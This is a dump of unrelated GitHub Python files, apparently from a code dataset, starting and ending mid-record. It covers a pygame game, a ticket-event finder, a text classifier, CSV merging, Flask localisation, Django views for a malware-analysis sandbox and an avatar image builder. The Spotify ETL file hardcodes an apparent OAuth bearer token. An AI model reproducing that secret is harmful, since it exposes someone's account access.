ai_settings, ship.rect.height, alien.rect.height)\n\n    for row_number in range(number_rows):\n        # create the first line of aliens\n        for alien_number in range(number_aliens_x):\n            # create one alien and add it in the line\n            create_alien(ai_settings, screen, aliens, alien_number, row_number)\n\n\ndef check_fleet_edges(ai_settings, aliens):\n    '''react when one alien touches the edge'''\n    for alien in aliens.sprites():\n        if alien.check_edges():\n            change_fleet_direction(ai_settings, aliens)\n            break\n\n\ndef change_fleet_direction(ai_settings, aliens):\n    '''move all aliens down and change their direction'''\n    for alien in aliens.sprites():\n        alien.rect.y += ai_settings.fleet_drop_speed\n    ai_settings.fleet_direction *= -1\n\n\ndef update_aliens(ai_settings, screen, stats, sb, ship, aliens, bullets):\n    \"\"\"\n    check if there are aliens touching the edge\n    then update positions for all aliens\n    \"\"\"\n    check_fleet_edges(ai_settings, aliens)\n    aliens.update()\n\n    # detect a collision between an alien and a ship\n    if pygame.sprite.spritecollideany(ship, aliens):\n        ship_hit(ai_settings, stats, screen, sb, ship, aliens, bullets)\n\n    # check if an alien touches the bottom edge\n    check_aliens_bottom(ai_settings, stats, screen, sb, ship, aliens, bullets)\n\n\ndef check_aliens_bottom(ai_settings, stats, screen, sb, ship, aliens, bullets):\n    '''check if an alien touches the bottom'''\n    screen_rect = screen.get_rect()\n    for alien in aliens.sprites():\n        if alien.rect.bottom >= screen_rect.bottom:\n            # act like ship collision\n            ship_hit(ai_settings, stats, screen, sb, ship, aliens, bullets)\n            break\n\n\ndef ship_hit(ai_settings, stats, screen, sb, ship, aliens, bullets):\n    '''the ship responds when it collides with an alien'''\n\n    if stats.ships_left > 0:\n        stats.ships_left -= 1\n        sb.prep_ships()\n\n        # empty the alien list and the bullet list\n        aliens.empty()\n        bullets.empty()\n\n        # create a new group of aliens and re-position the ship\n        create_fleet(ai_settings, screen, ship, aliens)\n        ship.center_ship()\n\n        # pause\n        
sleep(2)\n\n else:\n stats.game_active = False\n pygame.mouse.set_visible(True)\n\n\ndef check_high_score(stats, sb):\n '''check if new high score'''\n if stats.score > stats.high_score:\n stats.high_score = stats.score\n sb.prep_high_score()\n","repo_name":"zjian107-su/Python-Learn-Collection","sub_path":"hands_on_projects/alien_invasion/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22964382866","text":"import random\r\n\r\nhasEvent = {}\r\n\r\ndef convertFormat(x, y):\r\n\tkey = \"{} {}\".format(x, y)\r\n\treturn key\r\n\r\ndef eventsGenerator():\r\n\r\n\tnumber = random.randint(5, 100)\r\n\tevents = []\r\n\r\n\tfor i in range(number):\r\n\t\twhile True:\r\n\t\t\tx = random.randint(-10, 10)\r\n\t\t\ty = random.randint(-10, 10)\r\n\t\t\tkey = convertFormat(x, y)\r\n\r\n\t\t\tif hasEvent.get(key, False):\r\n\t\t\t\tcontinue\r\n\t\t\thasEvent[key] = True\r\n\t\r\n\t\t\ttickets = ticketsGenerator()\r\n\t\t\tevents.append((x, y, tickets, (i + 1)))\r\n\t\t\tbreak\r\n\r\n\treturn events\r\n\r\ndef ticketsGenerator():\r\n\r\n\tnumber = random.randint(0, 100)\r\n\ttickets = []\r\n\r\n\tfor i in range((number + 1)):\r\n\t\tprice = round(random.uniform(1, 100), 2)\r\n\t\ttickets.append((price, number))\r\n\r\n\ttickets = sorted(tickets, key=lambda x: int(x[0]))\r\n\r\n\treturn tickets\r\n\r\ndef distance(c1, c2):\r\n\tx1, y1 = c1\r\n\tx2, y2 = c2\r\n\r\n\treturn abs(x1 - x2) + abs(y1 - y2)\r\n\r\ndef findEvents(events, user):\r\n\r\n\tinfo = []\r\n\r\n\tfor i in range(len(events)):\r\n\t\teventID = events[i][3]\r\n\t\tdis = distance(user, events[i][:2])\r\n\t\tprice = events[i][2][0][0]\r\n\t\tnumber = events[i][2][0][1]\r\n\r\n\t\tinfo.append((eventID, dis, price, number))\r\n\r\n\tinfo = sorted(info, key=lambda x: x[1])\r\n\r\n\treturn info[:5]\r\n\r\ndef idGenerator(num):\r\n\tif num >= 10:\r\n\t\treturn '0' + str(num)\r\n\telse:\r\n\t\treturn '00' + str(num)\r\n\r\ndef main():\r\n\r\n\tevents = eventsGenerator()\r\n\r\n\twhile True:\r\n\r\n\t\ttry:\r\n\r\n\t\t\tuser = input(\"\\nWhere are you? (Enter exit to exit) \")\r\n\r\n\t\texcept:\r\n\r\n\t\t\tprint(\"\\nUnable to retrieve input, exiting the program\")\r\n\t\t\tbreak\r\n\r\n\t\tif user == \"exit\":\r\n\t\t\tbreak\r\n\r\n\t\tif (not user.replace(\",\", \"\").replace(\" \", \"\").replace(\"(\", \"\").replace(\")\", \"\").replace(\"+\", \"\").replace(\"-\", \"\").isdigit()) or (len(user) < 2):\r\n\t\t\tprint(\"Invalid Input. Coordinates must be digits within range -10 to 10\\n\")\r\n\t\t\tcontinue\r\n\r\n\t\tuser = list(map(int, user.split(\",\")))\r\n\r\n\t\tif (user[0] > 10 or user[0] < -10) or (user[1] > 10 or user[1] < -10):\r\n\t\t\tprint(\"Invalid Input. 
Coordinates must be digits within range -10 to 10\\n\")\r\n\t\t\tcontinue\r\n\r\n\t\tclosest = findEvents(events, user)\r\n\r\n\t\tprint(\"\\nEvents closest to ({}, {}):\\n\".format(user[0], user[1]))\r\n\r\n\t\tfor event in closest:\r\n\t\t\teventID = idGenerator(event[0])\r\n\t\t\tprint(\"Event Info: ID -> {}, Price -> ${}, {} tickets remaining, Distance -> {}\".format(eventID, event[2], event[3], event[1]))\r\n\r\n\tprint(\"Shutting Down...\")\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()","repo_name":"LanghaoZ/Miscellaneous","sub_path":"Viagogo OA 2018/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37454140661","text":"\nimport numpy as np\n\nfrom scipy.sparse import csr_matrix\n\nfrom inspect import getmembers, isfunction, getargspec\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.metrics import f1_score\n\nimport features\n\n\nclass Classifier:\n def __init__(self, classifier, with_feat, with_bigram, is_threaded=False):\n \"\"\"\n Initialize the classifier instance with important values such as the algorithm or the feature\n representation\n :param classifier: scikit-learn object that is going to be used as classifer\n :param with_feat: boolean variable indicating whether indicator features are being used\n :param with_bigram: boolean variable indicating whether bigrams are being used\n :param is_threaded: boolean variable indicating whether multithread mode is enabled\n \"\"\"\n self.classifier = classifier\n self.inv_vocab = {}\n self.tfidf_transformer = TfidfTransformer()\n self.count_vect = CountVectorizer()\n if with_bigram:\n self.bigram_vect = CountVectorizer(ngram_range=(2, 2), max_features=100)\n self.tfidf_bigram = TfidfTransformer()\n\n self.with_feat = with_feat\n self.with_bigram = with_bigram\n self.is_threaded = is_threaded\n\n def learn_classifier(self, train_ds, train_labels, test_ds, test_labels, queue=[]):\n \"\"\"\n Train, test and compute the performance of the algorithm (F1 score) with the given train and test set\n :param train_ds: numpy array with the training set\n :param train_labels: numpy array with the training labels\n :param test_ds: numpy array with the testing set\n :param test_labels: numpy array with the testing labels\n :param queue: when threaded mode is enabled, queue where to put the results.\n :return: F1 score if no thread mode is in use\n \"\"\"\n # Train model\n clf = self.train(train_ds, train_labels)\n # Test it\n predictions = self.test(clf, test_ds)\n # Output results\n if self.is_threaded:\n queue.put(self.accuracy(predictions, test_labels))\n else:\n return self.accuracy(predictions, test_labels)\n\n def build_feature_matrix(self, dataset):\n \"\"\"\n Given a new dataset, build the feature matrix with the values of the indicator functions for each\n sample in matrix\n :param dataset: numpy array with all documents in training set\n :return: numpy array with the feature values for each document in training set\n \"\"\"\n # Create the dictionary of feature functions if it is not created\n if len(features.features_fun_dict) == 0:\n i = 0\n for o in getmembers(features):\n if isfunction(o[1]):\n features.features_fun_dict[i] = o[1]\n i += 1\n features.num_features = len(features.features_fun_dict)\n\n matrix = np.zeros([dataset.shape[0], features.num_features])\n\n 
# For each sample in dataset, call every feature function and store its value\n for i in range(dataset.shape[0]):\n for j in range(features.num_features):\n args = getargspec(features.features_fun_dict[j]).args\n if len(args) == 2:\n matrix[i, j] = features.features_fun_dict[j](dataset[i], self.inv_vocab)\n else:\n matrix[i, j] = features.features_fun_dict[j](dataset[i])\n\n # Return sparse matrix with the features (needed by the classifier)\n return csr_matrix(matrix)\n\n def train(self, train_set, train_labels):\n \"\"\"\n Train classifier\n :param train_set: numpy array with all documents in training set\n :param train_labels: numpy array with labels in training set\n :return: trained classifier\n \"\"\"\n # Transform dataset, obtaining the count of every word in vocabulary and performing tfidf conversion\n train_counts = self.count_vect.fit_transform(train_set)\n train_tfidf = self.tfidf_transformer.fit_transform(train_counts)\n\n # Build inverse vocabulary with all words in dictionary (needed to recover the word from the index\n # in some feature functions)\n self.inv_vocab = {v: k for k, v in self.count_vect.vocabulary_.items()}\n\n # If using feature representation, obtain the corresponding feature matrix and append\n if self.with_feat:\n matrix = self.build_feature_matrix(train_counts)\n matrix_norm = Normalizer().fit(matrix).transform(matrix)\n train_tfidf = csr_matrix(np.concatenate((train_tfidf.toarray(), matrix_norm.toarray()), axis=1))\n\n # If using bigram representation, obtain the top 100 bigrams and append\n if self.with_bigram:\n bigram_counts = self.bigram_vect.fit_transform(train_set)\n bigram_tfidf = self.tfidf_bigram.fit_transform(bigram_counts)\n train_tfidf = csr_matrix(np.concatenate((train_tfidf.toarray(), bigram_tfidf.toarray()), axis=1))\n\n # Return trained classifier\n return self.classifier.fit(train_tfidf, train_labels)\n\n def test(self, clf, test_set):\n \"\"\"\n Test classifier\n :param clf: scikit-learn object containing a trained classifier with the desired algorithm\n :param test_set: numpy array with all documents in test set\n :return: numpy array with the predictions\n \"\"\"\n # Transform test set the same way the training set is transformed\n test_counts = self.count_vect.transform(test_set)\n test_tfidf = self.tfidf_transformer.transform(test_counts)\n\n # If using feature representation, obtain the corresponding feature matrix and append\n if self.with_feat:\n test_matrix = self.build_feature_matrix(test_counts)\n test_matrix_norm = Normalizer().fit(test_matrix).transform(test_matrix)\n test_tfidf = csr_matrix(np.concatenate((test_tfidf.toarray(), test_matrix_norm.toarray()), axis=1))\n\n # If using feature representation, obtain the corresponding top 100 bigrams and append\n if self.with_bigram:\n bigram_counts = self.bigram_vect.fit_transform(test_set)\n bigram_tfidf = self.tfidf_bigram.fit_transform(bigram_counts)\n test_tfidf = csr_matrix(np.concatenate((test_tfidf.toarray(), bigram_tfidf.toarray()), axis=1))\n\n # Return predictions\n return clf.predict(test_tfidf)\n\n @staticmethod\n def accuracy(predictions, test_labels):\n \"\"\"\n Compute the desired measure of performance (F1 in this case)\n :param predictions: numpy array with the predictions made by our classifier\n :param test_labels: numpy array with the real labels\n :return: F1 score of the predictions made\n \"\"\"\n return f1_score(test_labels, predictions, average='micro') * 
100\n\n","repo_name":"jsendino/NewsAggregator","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7331932132","text":"import os\nimport pandas as pd\nimport numpy as np\n\n\ndef listdir(path, list_name): # 传入存储的list\n for file in os.listdir(path):\n file_path = os.path.join(path, file)\n if os.path.isdir(file_path):\n listdir(file_path, list_name)\n else:\n list_name.append(file_path)\n\nfile_paths = []#F:\\gitworkspace\\python\\e-nose-cnn\\data\nlistdir(\"D:\\\\WeChat\\\\WeChat Files\\\\mzf14ihntts\\\\FileStorage\\\\File\\\\2019-11\\\\dataset\\\\train_set\", file_paths)\n# print(file_paths)\n\n##csv add hearder\ndata = range(60)\ndata = pd.DataFrame(data)\ndata = data.values\ndata = list(map(list,zip(*data)))\ndata = pd.DataFrame(data)\ndata.to_csv(os.path.join(\"D:\\\\WeChat\\\\WeChat Files\\\\mzf14ihntts\\\\FileStorage\\\\File\\\\2019-11\\\\dataset\", \"train_set.csv\"), encoding='utf_8_sig', index=False, header=0)\n\nfor i in file_paths:\n try:\n data = pd.read_csv(i, usecols=['0','1','2','3','4','5','6','7','8','9'])\n data = data.values\n data = list(map(list,zip(*data)))\n data = pd.DataFrame(data)\n data.to_csv(os.path.join(\"D:\\\\WeChat\\\\WeChat Files\\\\mzf14ihntts\\\\FileStorage\\\\File\\\\2019-11\\\\dataset\", \"train_set.csv\"), encoding='utf_8_sig',index=False, header=0, mode = 'a+') \n except Exception as e:\n print(i)","repo_name":"19120332843/learning_python","sub_path":"e-nose-cnn/all_csv2one_csv.py","file_name":"all_csv2one_csv.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40596767973","text":"import sqlalchemy\nimport pandas as pd\nimport sqlite3\nimport requests\nimport json\nimport datetime\nimport pandas as pd\n\nfrom os import access\n\n\nDB_LOCATION = \"sqlite:///my_played_tracks.sqlite\"\nUSER_ID = \"Sztaber\"\nTOKEN = 'BQC2BaRBT6d4rH0NIh-SN2H6wz12g-7pmV1PGYVRrMtuAjYgsQzHu57ZjnUK-KaQw-hn6G0i7rPhoLlHrn17Mv_LB2zF-H7V0VcKvFhn1mePXDm-Yi07hDgncORDzzjMZg5bacqmwB9Ko3MXdDrUrJ-bVA2nJzXg94GbR5H2'\n\n# Create function for validate the data\n\ndef check_if_valid_data (df: pd.DataFrame) -> bool:\n if df.empty:\n print(\"No songs downloaded. 
Finishing execution.\")\n        return False\n    elif pd.Series(df['played_at']).is_unique:\n        pass\n    else:\n        raise Exception('Primary key check is violated')\n\n    if df.isnull().values.any():\n        raise Exception('Null values Found')\n\n    properTime = datetime.datetime.now() - datetime.timedelta(days=30)\n    properTime = properTime.replace(hour=0, minute=0, second=0, microsecond=0)\n\n    timestamps = df['timestamps'].tolist()\n\n    for timestamp in timestamps:\n        if datetime.datetime.strptime(timestamp, \"%Y-%m-%d\") != properTime:\n            raise Exception('At least one song does not have proper timestamp')\n\n    return True\n\nif __name__ == '__main__':\n\n\n\n\n#Extract the data from Spotify API\n\n    headers = {\n        'Accept' : 'application/json',\n        'Content-Type' : 'application/json',\n        'Authorization' : f'Bearer {TOKEN}'\n    }\n\n    today = datetime.datetime.now()\n    time_range = today - datetime.timedelta(days=7)\n    time_range_unix = int(time_range.timestamp()) * 1000\n\n    # Get played songs from the last 7 days\n    r = requests.get(f'https://api.spotify.com/v1/me/player/recently-played?after={time_range_unix}', headers=headers)\n\n    data = r.json()\n\n\n\n\n    # Put the data into dataframe\n\n    songs_names = []\n    artists_names = []\n    played_at_list = []\n    timestamps_list = []\n\n    for song in data['items']:\n        songs_names.append(song['track']['name'])\n        artists_names.append(song['track']['album']['artists'][0]['name'])\n        played_at_list.append(song['played_at'])\n        timestamps_list.append(song['played_at'][0:10])\n\n    song_dict = {\n        'song_name' : songs_names,\n        'artist_name' : artists_names,\n        'played_at' : played_at_list,\n        'timestamps' : timestamps_list \n    }\n\n    song_df = pd.DataFrame(song_dict, columns=['song_name', 'artist_name', 'played_at', 'timestamps'])\n\n    print(song_df)\n\n\n\n    \n\n\n\n\n\n    engine = sqlalchemy.create_engine(DB_LOCATION)\n    conn = sqlite3.connect('my_played_tracks.sqlite')\n    cursor = conn.cursor()\n\n    sql_query = \"\"\"\n    CREATE TABLE IF NOT EXISTS my_played_tracks (\n        song_name VARCHAR(200),\n        artist_name VARCHAR(200),\n        played_at VARCHAR(200),\n        timestamp VARCHAR(200),\n        CONSTRAINT primary_key_constraint PRIMARY KEY (played_at)\n    )\n    \"\"\"\n\n    cursor.execute(sql_query)\n    print(\"Database opened successfully!\")\n    \n\n\n\n\n\n    ","repo_name":"Sztabers/Spotify_ETL","sub_path":"dags/spotify_etl.py","file_name":"spotify_etl.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12097810452","text":"#!/usr/bin/env python3\n'''\nBasic flask application uses\nbabel to switch between languages\n'''\nfrom flask import Flask, render_template, request\nfrom flask_babel import Babel, _\n\n\napp = Flask(__name__)\nbabel = Babel(app)\n\n\nclass Config:\n    '''\n    Configuration file for\n    flask babel vars\n    '''\n    LANGUAGES = [\"en\", \"fr\"]\n    BABEL_DEFAULT_LOCALE = \"en\"\n    BABEL_DEFAULT_TIMEZONE = \"UTC\"\n\n\napp.config.from_object(Config)  # Configuration initialized in app instance\n\n\n@babel.localeselector\ndef get_locale() -> str:\n    '''\n    selects a locale to use as default\n    Detects locale variable in requests\n    '''\n    supported_locales = ['en', 'fr']\n    if 'locale' in request.args:\n        locale = request.args.get('locale')\n        if locale in supported_locales:\n            return locale\n    return request.accept_languages.best_match(app.config['LANGUAGES'])\n\n\n@app.route('/', strict_slashes=False)\ndef hello_world() -> str:\n    '''\n    Home route serves index page\n    index page\n    '''\n    return render_template('4-index.html')\n\n\nif __name__ 
== \"__main__\":\n '''\n Starts code if not imported\n '''\n app.run()\n","repo_name":"Adisa-Shobi/alx-backend","sub_path":"0x02-i18n/4-app.py","file_name":"4-app.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16458566916","text":"import os\nimport logging\nfrom django.http import HttpResponse, FileResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login\nfrom web.forms import FileSubmissionForm, RegistrationForm\nfrom django.contrib.auth.decorators import login_required\nfrom web.utils import prep_file_submission\nfrom web.tasks import start_analysis, get_my_tasks_info\nfrom analysis.reporting.report import get_backend_report, get_all_reports, download_artifact\n\n\nlogging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\nLOG = logging.getLogger(__name__)\n\n\ndef index(request):\n \"\"\"\n This function is called when a user visits the homepage of ELFEN.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n tasks_info = get_my_tasks_info()\n LOG.debug(\"Index view called\")\n return render(request, \"web/home.html\", {\"recent_tasks\": tasks_info})\n\n\ndef sign_up(request):\n \"\"\"\n This function is called when a user wants to create a new account in ELFEN.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n LOG.debug(\"Sign up view called\")\n form = RegistrationForm()\n\n password_tips = form.fields.get(\"password1\", \"\").help_text.split(\"\\n\")\n\n if request.method == \"POST\":\n LOG.debug(\"POST request received to sign up\")\n form = RegistrationForm(request.POST)\n if form.is_valid():\n LOG.debug(\"POST request received to sign up is valid\")\n user = form.save()\n login(request, user)\n return redirect(\"home\")\n\n return render(request, \"registration/sign_up.html\", {\"form\": form,\n \"password_tips\": password_tips})\n\n\n@login_required\ndef submit_elf(request):\n \"\"\"\n This function accepts file uploads from users and asynchronously\n starts analysis.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n LOG.debug(\"Submit ELF view called\")\n form = FileSubmissionForm()\n\n if request.method == \"POST\":\n LOG.debug(\"POST request received to submit ELF\")\n form = FileSubmissionForm(request.POST, request.FILES)\n\n # Only authenticated users submitting valid forms are allowed\n if form.is_valid():\n LOG.debug(\"POST request received to submit ELF is valid\")\n file = request.FILES[\"file\"]\n additional_files = request.FILES.getlist(\"additional_files\")\n userland_tracing = True if request.POST.get(\"userland_tracing\", None) else False\n enable_internet = True if request.POST.get(\"enable_internet\", None) else False\n exec_args = request.POST.get(\"execution_arguments\", \"\")\n status, ret = prep_file_submission(file, request.user.username,\n request.POST[\"execution_time\"],\n request.POST.get(\"machine\"),\n execution_arguments=exec_args,\n userland_tracing=userland_tracing,\n enable_internet=enable_internet,\n additional_files=additional_files)\n\n if status is False:\n # TODO: Prepare error page if writing sample to disk fails\n return 
HttpResponse(ret[\"error_msg\"])\n elif status is True:\n context = ret\n LOG.debug(f\"Execution context: {context}\")\n start_analysis.delay(context)\n return redirect(\"report\", context[\"submission_uuid\"])\n\n return render(request, \"web/submit_elf.html\", {\"form\": form})\n\n\ndef elf_reports(request, submission_uuid):\n \"\"\"\n This function returns the analysis report for a given task UUID.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :param submission_uuid: Submission (aka task) UUID\n :type submission_uuid: str\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n all_reports = get_all_reports(submission_uuid, web=True)\n\n if all_reports is None:\n context = {\n \"msg\": f\"Task UUID: {submission_uuid} not found. You may have to \"\n \"wait for a few seconds until the task is registered in the database. \"\n \"Refresh the page to check again.\"\n }\n return render(request, \"web/404.html\", context=context, status=404)\n\n return render(request, \"web/report_file.html\", all_reports)\n\n\ndef elf_backend_report(request, submission_uuid, backend):\n \"\"\"\n This function returns the analysis report for a given backend for a\n given task UUID.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :param submission_uuid: Submission (aka task) UUID\n :type submission_uuid: str\n :param backend: ELFEN backend name\n :type backend: str\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n report = get_backend_report(submission_uuid, backend)\n\n context = {\n \"submission_uuid\": submission_uuid,\n \"backend\": backend,\n \"report\": report\n }\n\n return render(request, \"web/report_backend.html\", context)\n\n\ndef not_found(request, exception):\n return render(request, \"web/404.html\", status=404)\n\n\ndef download(request, submission_uuid, backend):\n \"\"\"\n This function downloads the artifact for a given backend for a\n given task UUID.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :param submission_uuid: Submission (aka task) UUID\n :type submission_uuid: str\n :param backend: ELFEN backend name\n :type backend: str\n :return: Artifact file or HTTP response\n :rtype: django.http.response.FileResponse or django.http.response.HttpResponse\n \"\"\"\n fd = download_artifact(submission_uuid, backend)\n\n if fd:\n return FileResponse(fd, as_attachment=True)\n\n return render(request, \"web/404.html\", status=404)\n","repo_name":"nikhilh-20/ELFEN","sub_path":"web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6366,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"37"} +{"seq_id":"26640009693","text":"from PIL import Image, ImageTk\nimport os\n\nclass CharacterManip:\n \"\"\"The goal of this object is to represent the Character as a whole.\n\n Will take in information about what the character should look like. Will then manipulate\n the image to represent the given input. After will return data that TKinter will be able\n to display.\n\n Each funtion should return the new image. You should NEVER have to edit self.character/\n whatever we come up with. 
We want to keep loading to a minimum.\n \"\"\"\n\n def __init__(self):\n \"\"\"Set up an empty character.\n\n Species, gender, and color are filled in later through\n update_character() or define_character().\n \"\"\"\n self.species = \"\"\n self.gender = \"\"\n self.color = 0 # int\n\n self.human_colors = [\"#ffdbac\",\n \"#f1c27d\",\n \"#e0ac69\",\n \"#c68642\",\n \"#8d5524\"]\n\n self.bear_colors = [\"#ffe7b5\",\n \"#ffde58\",\n \"#d76300\",\n \"#633800\",\n \"#eff5eb\"]\n\n self.max_w = 250\n self.max_h = 400\n self.w = 0\n self.h = 0\n # Original image of the character\n self.character = Image.new(\"RGB\", (self.max_w, self.max_h))\n self.base = Image.new(\"RGB\", (self.max_w, self.max_h))\n self.mod = Image.new(\"RGB\", (self.max_w, self.max_h))\n self.m_skin = Image.new(\"L\", (self.max_w, self.max_h))\n # List of clothes filenames\n self.f_shirts = []\n self.f_pants = []\n self.f_shoes = []\n # List of clothes masks\n self.shirts = []\n self.pants = []\n self.shoes = []\n\n self.curr_shirt = 0\n self.curr_pants = 0\n self.curr_shoes = 0\n\n self.def_col = \"#ff0000\"\n self.col_shirt = self.def_col\n self.col_pants = self.def_col\n self.col_shoes = self.def_col\n # self.col_skin = self.human_colors[color] # String\n self.col_skin = self.human_colors[0]\n\n # self.update_character(species, gender, color)\n\n # Masks for the different clothing items\n # Might need to be in lists or called only when needed\n\n # self.tshirt_mask = Image.open(os.path.join(\"assets\", \"tshirt_mask.gif\"))\n # self.tshirt_mask = self.tshirt_mask.convert(\"L\")\n\n # This is the color that the character is pasted onto.\n\n def _open(self, f_name, mode):\n return Image.open(os.path.join(\"assets\", f_name)).convert(mode)\n\n def define_character(self, char):\n \"\"\"Run whenever a character needs to be put back together.\n\n Usually for the display character at the end of creation or before editing.\n\n :return:\n \"\"\"\n\n self.species = char.species\n self.gender = char.gender\n self.color = char.race\n\n self._update_clothes_arrays()\n\n self.curr_shirt = self.f_shirts.index(char.shirt_f_name)\n self.curr_pants = self.f_pants.index(char.pants_f_name)\n self.curr_shoes = self.f_shoes.index(char.shoes_f_name)\n\n self.col_shirt = char.shirt_color\n self.col_pants = char.pants_color\n self.col_shoes = char.shoes_color\n\n self.setAllColor()\n\n def update_character(self, s, g, c):\n \"\"\"Run whenever an attribute of the character's physical being is changed.\n\n Use this function during the character creation process.\n \"\"\"\n\n self.species = s\n self.gender = g\n self.color = c\n\n self.curr_shirt = 0\n self.curr_pants = 0\n self.curr_shoes = 0\n\n self._update_clothes_arrays()\n\n self.setAllColor()\n\n def _update_clothes_arrays(self):\n self.shirts = []\n self.pants = []\n self.shoes = []\n\n if self.species == \"Human\" and self.gender == \"Female\":\n self.character = self._open(\"fe_base.gif\", \"RGB\")\n self.m_skin = self._open(\"fe_m_skin.gif\", \"L\")\n # Load clothing file names\n self.f_shirts = [\"fe_m_blouse.gif\",\n \"fe_m_crop.gif\"]\n self.f_pants = [\"fe_m_jeans.gif\",\n \"fe_m_skirt.gif\"]\n self.f_shoes = [\"fe_m_tennis_shoes.gif\",\n \"fe_m_boots.gif\"]\n\n elif self.species == \"Human\" and self.gender == \"Male\":\n self.character = self._open(\"ma_base.gif\", \"RGB\")\n self.m_skin = self._open(\"ma_m_skin.gif\", \"L\")\n # Load clothing file names\n self.f_shirts = [\"ma_m_t_shirt.gif\",\n \"ma_m_long_sleeve.gif\"]\n self.f_pants = [\"ma_m_shorts.gif\",\n \"ma_m_long_jeans.gif\"]\n self.f_shoes = 
[\"ma_m_loafers.gif\",\n \"ma_m_tennis_shoes.gif\"]\n\n elif self.species == \"Bear\" and self.gender == \"Male\":\n self.character = self._open(\"bm_base.gif\", \"RGB\")\n self.m_skin = self._open(\"bm_m_skin.gif\", \"L\")\n # Load clothing file names\n self.f_shirts = [\"bm_m_t_shirt.gif\",\n \"bm_m_button_up.gif\"]\n self.f_pants = [\"bm_m_shorts.gif\",\n \"bm_m_jeans.gif\"]\n self.f_shoes = [\"bm_m_tennis_shoes.gif\"]\n\n elif self.species == \"Bear\" and self.gender == \"Female\":\n self.character = self._open(\"bf_base.gif\", \"RGB\")\n self.m_skin = self._open(\"bf_m_skin.gif\", \"L\")\n # Load clothing file names\n # Using the male clothes cuz im lazy\n self.f_shirts = [\"bm_m_t_shirt.gif\",\n \"bm_m_button_up.gif\"]\n self.f_pants = [\"bm_m_shorts.gif\",\n \"bm_m_jeans.gif\"]\n self.f_shoes = [\"bm_m_tennis_shoes.gif\"]\n\n for f_name in self.f_shirts:\n self.shirts.append(self._open(f_name, \"L\"))\n for f_name in self.f_pants:\n self.pants.append(self._open(f_name, \"L\"))\n for f_name in self.f_shoes:\n self.shoes.append(self._open(f_name, \"L\"))\n\n self.w, self.h = self.character.size\n # Scaling\n self.ratio = min(self.max_w / self.w, self.max_h / self.h)\n self.w = int(self.w * self.ratio)\n self.h = int(self.h * self.ratio)\n # Resize character image\n self.character = self.character.resize((self.w, self.h), Image.ANTIALIAS)\n self.base = self.character.copy()\n if self.m_skin:\n self.m_skin = self.m_skin.resize((self.w, self.h), Image.ANTIALIAS)\n\n # Resize clothes\n for i in range(len(self.shirts)):\n self.shirts[i] = self.shirts[i].resize((self.w, self.h), Image.ANTIALIAS)\n for i in range(len(self.pants)):\n self.pants[i] = self.pants[i].resize((self.w, self.h), Image.ANTIALIAS)\n for i in range(len(self.shoes)):\n self.shoes[i] = self.shoes[i].resize((self.w, self.h), Image.ANTIALIAS)\n\n def setAllColor(self):\n if self.species == \"Human\" and self.m_skin:\n self.setSkinColor(self.human_colors[self.color])\n elif self.species == \"Bear\" and self.m_skin:\n self.setSkinColor(self.bear_colors[self.color])\n\n self.setShirtColor(self.col_shirt)\n self.setPantsColor(self.col_pants)\n self.setShoesColor(self.col_shoes)\n\n def setSkinColor(self, rgbHex):\n self.col_skin = rgbHex\n self.mod = Image.new(\"RGB\", (self.w, self.h), self.col_skin)\n self.character.paste(self.mod, mask=self.m_skin)\n\n\n def setShirtColor(self, rgbHex):\n \"\"\"Creates and returns a tKinter image with the correct color shirt.\"\"\"\n self.col_shirt = rgbHex\n if self.shirts:\n self.mod = Image.new(\"RGB\", (self.w, self.h), self.col_shirt)\n # Pastes the color (mod) into the white area of the mask.\n self.character.paste(self.mod, mask=self.shirts[self.curr_shirt])\n return ImageTk.PhotoImage(self.character)\n\n def setPantsColor(self, rgbHex):\n \"\"\"Creates and returns a tKinter image with the correct color pants.\"\"\"\n self.col_pants = rgbHex\n if self.pants:\n self.mod = Image.new(\"RGB\", (self.w, self.h), self.col_pants)\n self.character.paste(self.mod, mask=self.pants[self.curr_pants])\n return ImageTk.PhotoImage(self.character)\n\n def setShoesColor(self, rgbHex):\n \"\"\"Creates and returns a tKinter image with the correct color shoes.\"\"\"\n self.col_shoes = rgbHex\n if self.shoes:\n self.mod = Image.new(\"RGB\", (self.w, self.h), self.col_shoes)\n self.character.paste(self.mod, mask=self.shoes[self.curr_shoes])\n\n return ImageTk.PhotoImage(self.character)\n\n def _shirtLeft(self):\n 